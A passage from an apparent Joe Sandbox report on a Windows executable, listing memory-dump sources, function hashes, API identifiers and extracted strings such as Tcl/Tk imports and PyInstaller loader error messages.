                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                  • Opcode ID: 7a9558e86fa8b462753dac68b64cf5067dc6b1cda5ab5f882eee36bb89ede29b
                                                                                                                                  • Instruction ID: f85aa1fe716a4f90d6e2d9aacf81271bdc7ad6e13d3a2cb8d16a7b9b1244fb57
                                                                                                                                  • Opcode Fuzzy Hash: 7a9558e86fa8b462753dac68b64cf5067dc6b1cda5ab5f882eee36bb89ede29b
                                                                                                                                  • Instruction Fuzzy Hash: 5D61E672E1868242E765AE288C1033EE6C5EF48770F948637D65D5E6D1DFADE8408E60
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                  • Instruction ID: 5efe0c0dd2486e79e2dc4071f15bd163044db54fa8d0db69b0d121abf3cab746
                                                                                                                                  • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                  • Instruction Fuzzy Hash: E351A136A1867186E7249B29CC4823AB3E0EB55B78F644132CE4D577D4CBBAEC52CB50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                  • Instruction ID: 5d9558d41fad137a29f9275e6e1b1c8e3ef1579fc04f938dabe4cfe1de447283
                                                                                                                                  • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                  • Instruction Fuzzy Hash: 38518676A1866186E7249B29CC4823AB3E0EB45F78F644132CE4D577D4CB7AEC42CB50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                  • Instruction ID: 3955fbc6c6a13939ea2c3df6e3ee1e2f621766711e064ade6f1deda3f3a96473
                                                                                                                                  • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                  • Instruction Fuzzy Hash: 23518576A18A9186E7249B29CC4423A73E1EB49B7CF644132CE4D077D5CB7AEC42CB50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                  • Instruction ID: 09e1df25d228048bca7edb4098ef04090a7638270dfd575af10d3f65716882bc
                                                                                                                                  • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                  • Instruction Fuzzy Hash: 7751B036A1869181E7249B29CC5423EB3E1EB48B7CFA44136CE4C57794CF7AEC52CB50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                  • Instruction ID: 73069249dcaa9d471082e162b7164b9817a93eb03232c3f6376f393dda07d27b
                                                                                                                                  • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                  • Instruction Fuzzy Hash: B051D932A1467185E7249F2DCC4827EA7E1EB45B78FA44132CE4C57B98CB7AEC42CB50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                  • Instruction ID: 59c07ff49bc74db52f9d94a6069d536ced333462b83669569d16adff153bfa80
                                                                                                                                  • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                  • Instruction Fuzzy Hash: 24519036A1869186E7249B29CC5023AB7E1EB48B6CFA44132CE4D17795DF7AEC43CB50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                  • Instruction ID: 85f3275f63cbd161a24ddc1e2c8fc1804e649043367026f3e7c212352665b16d
                                                                                                                                  • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                  • Instruction Fuzzy Hash: 7041D653D4974A04ED559D180D106B7A6C8EF12BB4DE852B2CDA9333C3CF8DED878620
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                  • Opcode ID: 8d7eb27f456b44a91f9c68f162ea9965681a4a0d7ad24d9c24e3bfc258020ebf
                                                                                                                                  • Instruction ID: ad580d90a420022a650b347eaba99aa91d293ae7cd46cf15c9abb3f7c39ea468
                                                                                                                                  • Opcode Fuzzy Hash: 8d7eb27f456b44a91f9c68f162ea9965681a4a0d7ad24d9c24e3bfc258020ebf
                                                                                                                                  • Instruction Fuzzy Hash: A841CE62B24A5582EF04DF2ADD141AAA3E1FB48FD0B899033DE4DA7B58DF7CC4418740
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d47bd74fb6a019277da3c6b3819bfc69269ba7720235d09fb044e88388ffaf66
                                                                                                                                  • Instruction ID: a34c30cf93af5d040c311506821d562c03948cb2676c4455c82c82bc172be4bf
                                                                                                                                  • Opcode Fuzzy Hash: d47bd74fb6a019277da3c6b3819bfc69269ba7720235d09fb044e88388ffaf66
                                                                                                                                  • Instruction Fuzzy Hash: 8531D632718B8241E724EB256C5017FBAD5EB84BA0F54423AEE4D57BD6DF7CD8014B14
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
                                                                                                                                  • Instruction ID: 5e8023b24147a52c86dc387b51ecf54f7cb41fc7af58cf8da08f36f234aa2b3b
                                                                                                                                  • Opcode Fuzzy Hash: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
                                                                                                                                  • Instruction Fuzzy Hash: 4DF04F72A186998EDBA49F2DAC0266AB7D4F708380B80803AE68D83A04D77C90608F14
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
                                                                                                                                  • Instruction ID: 417e7d8a0b9b2453381e96f5dce8a90aa3792851dd3d03cfa0507327a1d5a814
                                                                                                                                  • Opcode Fuzzy Hash: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
                                                                                                                                  • Instruction Fuzzy Hash: 9AA00121A19826D8E648AB04AC50236B2A0FB94301BD06032D00D414A4AF3CA500CA20
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc
                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                  • API String ID: 190572456-3427451314
                                                                                                                                  • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                  • Instruction ID: dfc76a27a370e35f56dad3a2aaf3a853e795f0616c96621c968c237bc1abd13f
                                                                                                                                  • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                  • Instruction Fuzzy Hash: F3E19A6491EB4390FA59BB14ED502B6A3E5EF49751FE81837C85D026A4FF3CB548CA30
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00007FF7262986B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF726293FA4,00000000,00007FF726291925), ref: 00007FF7262986E9
                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,00007FF726297C97,?,?,FFFFFFFF,00007FF726293834), ref: 00007FF72629782C
                                                                                                                                    • Part of subcall function 00007FF7262926C0: MessageBoxW.USER32 ref: 00007FF726292736
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                  • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                  • API String ID: 1662231829-930877121
                                                                                                                                  • Opcode ID: 9eab8ee9825a9fbd44869a095635737d99e10a8ea38952c2113d32bd4c9397e1
                                                                                                                                  • Instruction ID: 2816dd3b89d03b6d9f8995ae7234c7b252a76a8408aaedcbd2af0e14fa69b169
                                                                                                                                  • Opcode Fuzzy Hash: 9eab8ee9825a9fbd44869a095635737d99e10a8ea38952c2113d32bd4c9397e1
                                                                                                                                  • Instruction Fuzzy Hash: 3A414F11A2A64281FA54BB25DC516FBF2E1EFC4784FE45833D64E42695FF2CE6048B60
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                  • String ID: P%
                                                                                                                                  • API String ID: 2147705588-2959514604
                                                                                                                                  • Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                  • Instruction ID: 1effbaf9b434357eddd4ee8773280c9622be656813ca701ac0cfe7613b897f8c
                                                                                                                                  • Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                  • Instruction Fuzzy Hash: 2E51F9266187A186D6349F26B8182BBF7A1F798B61F404136EBDE43785DF3CD085DB20
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                  • String ID: -$:$f$p$p
                                                                                                                                  • API String ID: 3215553584-2013873522
                                                                                                                                  • Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                  • Instruction ID: a832362a4afeb6e379318969495900323216b7b5dbde12a1e31840f8b8abc810
                                                                                                                                  • Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                  • Instruction Fuzzy Hash: FC129261E0824386FB207A159D5427BE2DAFB40770FD48137E699666C8DBBCED84CF24
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                  • String ID: f$f$p$p$f
                                                                                                                                  • API String ID: 3215553584-1325933183
                                                                                                                                  • Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                  • Instruction ID: e68f1bf95bada1c60199f4a9c72f950bc2c753f97968aae4378f3aa2351eae37
                                                                                                                                  • Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                  • Instruction Fuzzy Hash: 2A127321E0C1C386FB607A159C546BBE2D1FB98B68FD44033D699466C4DBBCEC848F64
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
